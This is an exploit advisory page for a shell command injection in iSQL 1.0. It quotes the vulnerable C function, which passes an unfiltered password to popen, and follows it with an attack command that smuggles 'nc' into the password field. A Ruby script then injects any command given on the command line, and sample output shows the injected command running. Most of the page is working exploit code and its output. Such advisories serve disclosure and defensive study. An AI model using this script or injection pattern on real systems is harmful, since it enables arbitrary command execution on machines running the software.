iSQL 1.0 Shell Command Injection

2016.06.14
Credit: HaHwul
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-78

#!/bin/ruby # Exploit Title: iSQL(RL) 1.0 - Shell Command Injection # Date: 2016-06-13 # Exploit Author: HaHwul # Exploit Author Blog: www.hahwul.com # Vendor Homepage: https://github.com/roselone/iSQL # Software Link: https://github.com/roselone/iSQL/archive/master.zip # Version: 1.0 # Tested on: Debian [wheezy] # CVE : none =begin ### Vulnerability Point :: [isql_main.c 455 line] popen(cmd,"r"); code is vulnerable :: don't filtering special characters in str value 446 char *get_MD5(char *str){ 447 FILE *stream; 448 char *buf=malloc(sizeof(char)*33); 449 char cmd[100]; 450 memset(buf,'\0',sizeof(buf)); 451 memset(cmd,'\0',sizeof(cmd)); 452 strcpy(cmd,"echo "); //5 453 strcpy((char *)cmd+5,str); 454 strcpy((char *)cmd+5+strlen(str)," | md5sum"); 455 stream=popen(cmd,"r"); 456 fread(buf,sizeof(char),32,stream); 457 // printf("%s\n",buf); 458 return buf; 459 } ### Vulnerability Triger 614 while (USER_NUM==-1){ 615 printf(">username:"); 616 scanf("%s",username); 617 printf(">password:"); 618 scanf("%s",passwd); 619 md5=get_MD5(passwd); ### Vulnerability Run >username:asdf; >password:asdf;top;echo 1 (~) #> ps -aux | grep top root 13279 0.0 0.0 4472 860 pts/1 S+ 13:33 0:00 sh -c echo asdf;top;echo | md5sum root 13280 0.3 0.0 26304 3200 pts/1 S+ 13:33 0:00 top =end ### Attack command #> (sleep 5; echo -en 'aasdf\n';sleep 1;echo -en 'asdf;nc;echo 1';sleep 10) | ./isql ### Ruby Code puts "SQL 1.0 - Shell Command Injection" puts "by hahwul" if(ARGV.size != 1) puts "Usage: ruby iSQL_command_injection.rb [COMMAND]" puts " need ./isql in same directory" exit() else puts "CMD :: "+ARGV[0] puts "Run Injection.." system("(sleep 5; echo -en 'aasdf\n';sleep 1;echo -en 'asdf;#{ARGV[0]};echo 1';sleep 10) | ./isql") end ### Sample Output =begin #> ruby test.rb nc # Exploit Title: iSQL 1.0 Shell Command Injection by hahwul CMD :: nc Run Injection.. *************** welcome to ISQL **************** * version 1.0 * * Designed by RL * * Copyright (c) 2011, RL. All rights reserved * ************************************************ >username:>password:verify failure , try again ! This is nc from the netcat-openbsd package. An alternative nc is available in the netcat-traditional package. usage: nc [-46bCDdhjklnrStUuvZz] [-I length] [-i interval] [-O length] [-P proxy_username] [-p source_port] [-q seconds] [-s source] [-T toskeyword] [-V rtable] [-w timeout] [-X proxy_protocol] [-x proxy_address[:port]] [destination] [port] >username:>password:verify failure , try again ! ^Ctest.rb:10:in `system': Interrupt from test.rb:10:in `<main>' =end


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top